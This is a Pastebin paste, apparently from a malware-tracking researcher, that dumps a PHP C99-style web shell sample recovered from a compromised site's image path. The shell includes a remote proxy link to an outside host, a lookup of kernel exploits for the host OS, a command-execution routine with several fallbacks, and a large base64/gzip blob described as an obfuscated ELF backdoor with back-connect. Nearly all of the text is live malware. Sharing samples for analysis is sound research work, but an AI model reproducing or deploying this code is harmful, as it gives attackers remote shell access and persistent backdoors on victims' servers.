unixfreaxjp

#PHP/C99SHELL: ELF Obfs binary Backdoors + BackConnect! ()

Oct 14th, 2012
428
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. // Target Infection: www.bati-bois.com/photos/1.jpg
  2. #MalwareMustDIE!!!
  3.  
  4. <?php
  5. //
  6. //for php proxy purposes
  7. function selfURL() { $s = empty($_SERVER["HTTPS"]) ? '' : ($_SERVER["HTTPS"] == "on") ? "s" : ""; $protocol = strleft(strtolower($_SERVER["SERVER_PROTOCOL"]), "/").$s; $port = ($_SERVER["SERVER_PORT"] == "80") ? "" : (":".$_SERVER["SERVER_PORT"]); return $protocol."://".$_SERVER['SERVER_NAME'].$port.$_SERVER['REQUEST_URI']; } function strleft($s1, $s2) { return substr($s1, 0, strpos($s1, $s2)); }
  8. $selfurl = base64_encode(selfURL());
  9. $phprox="http://twofaced.org/proxy/index.php?q=".$selfurl;
  10.  
  11. //end of link
  12.  
  13. //milw0rm search
  14. $Lversion = php_uname(r);
  15. $OSV = php_uname(s);
  16. if(eregi("Linux",$OSV))
  17. {
  18. $Lversion=substr($Lversion,0,6);
  19. $millink="http://milw0rm.com/search.php?dong=Linux Kernel ".$Lversion;
  20. }else{
  21. $Lversion=substr($Lversion,0,3);
  22. $millink="http://milw0rm.com/search.php?dong=".$OSV." ".$Lversion;
  23. }
  24. //End of milw0rm search
  25.  
  26.  
  27. //w4ck1ng Shell
  28. if (!function_exists("myshellexec"))
  29. {
  30. if(is_callable("popen")){
  31. function myshellexec($command) {
  32. if (!($p=popen("($command)2>&1","r"))) {
  33. return 126;
  34. }
  35. while (!feof($p)) {
  36. $line=fgets($p,1000);
  37. $out .= $line;
  38. }
  39. pclose($p);
  40. return $out;
  41. }
  42. }else{
  43. function myshellexec($cmd)
  44. {
  45. global $disablefunc;
  46. $result = "";
  47. if (!empty($cmd))
  48. {
  49. if (is_callable("exec") and !in_array("exec",$disablefunc)) {exec($cmd,$result); $result = join("\n",$result);}
  50. elseif (($result = `$cmd`) !== FALSE) {}
  51. elseif (is_callable("system") and !in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
  52. elseif (is_callable("passthru") and !in_array("passthru",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
  53. elseif (is_resource($fp = popen($cmd,"r")))
  54. {
  55. $result = "";
  56. while(!feof($fp)) {$result .= fread($fp,1024);}
  57. pclose($fp);
  58. }
  59. }
  60. return $result;
  61. }
  62. }
  63. }
  64. $proxy_shit="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